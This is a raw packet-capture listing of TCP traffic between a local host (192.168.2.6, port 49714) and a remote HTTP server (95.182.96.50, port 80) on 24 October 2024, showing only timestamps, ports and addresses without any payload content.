Oct 24, 2024 13:54:22.221338034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221362114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221383095 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221390963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221426010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221463919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221472025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221503973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221515894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221568108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221600056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221613884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221632957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221635103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221668005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221710920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221719980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221755028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221786976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221817017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221832037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221869946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221923113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221956968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221965075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221992970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222016096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222032070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222035885 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222086906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222120047 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222132921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222156048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222171068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222188950 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222224951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222225904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222279072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222313881 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222332954 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222347021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222373962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222398996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222400904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222450972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222475052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222486973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222521067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222533941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222554922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222568035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222596884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222599030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222652912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222691059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222702026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222706079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222742081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222774982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222810030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222821951 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222847939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222855091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222882986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222912073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222944021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.222959042 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.222995996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223023891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223031044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223040104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223084927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223131895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223140001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223191977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223220110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223265886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223273993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223352909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223362923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223381996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223400116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223417044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223423004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223433971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223443031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223450899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223468065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223476887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223483086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223495960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223501921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223514080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223516941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223531961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223552942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223553896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223568916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223578930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223584890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223603964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223608017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223619938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223632097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223638058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223653078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223663092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223670959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223681927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223686934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223702908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223709106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223717928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223730087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223733902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223752022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223762989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223769903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223777056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223788977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223805904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223809004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223820925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223828077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223835945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223851919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223856926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223869085 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223881006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223886013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223901033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223907948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223916054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223932028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223932028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223948956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223956108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223967075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223982096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.223982096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.223999977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.224004984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.224014997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.224025965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.224031925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.224036932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.224045038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.224066973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.224066973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.224087000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.334005117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334079981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334084034 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.334140062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.334151030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334187031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334228039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334261894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334283113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.334296942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334310055 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.334331989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334342957 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.334366083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334402084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334412098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.334469080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334503889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334517002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.334562063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334614992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334655046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334676027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.334693909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334742069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.334748983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334798098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.334810972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334867001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334897041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334912062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.334932089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334938049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.334966898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.334976912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335000992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335036993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335057974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335071087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335107088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335115910 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335140944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335175991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335192919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335213900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335223913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335248947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335283041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335287094 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335347891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335376978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335403919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335412025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335418940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335445881 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335447073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335475922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335525036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335529089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335565090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335597992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335647106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335650921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335680962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335716009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335728884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335772991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335812092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335819006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335845947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335892916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335900068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335937023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335968018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.335969925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.335994005 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336007118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336014986 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336040020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336083889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336083889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336114883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336169004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336201906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336215019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336257935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336292028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336297989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336344957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336380959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336396933 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336430073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336433887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336467981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336518049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336524010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336558104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336605072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336627007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336647987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336658001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336693048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336704969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336728096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336752892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336761951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336777925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336791992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336800098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336838007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336867094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336893082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336899996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336919069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336936951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.336977959 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.336987972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337022066 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337066889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337080002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337115049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337148905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337166071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337183952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337234020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337269068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337280035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337302923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337337971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337347984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337372065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337387085 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337405920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337413073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337435007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337470055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337487936 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337505102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337515116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337536097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337568998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337604046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337615013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337632895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337675095 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337683916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337719917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337749004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337778091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337781906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337800980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337825060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337841988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337883949 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337892056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337927103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337934971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337961912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.337974072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.337997913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338023901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.338047981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.338056087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338099003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.338109970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338140011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338182926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.338193893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338229895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338259935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338284969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.338315964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338341951 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.338365078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.338371038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338423014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338474035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338491917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.338531971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338566065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338574886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.338618040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338654041 CEST	80	49714	95.182.96.50	192.168.2.6
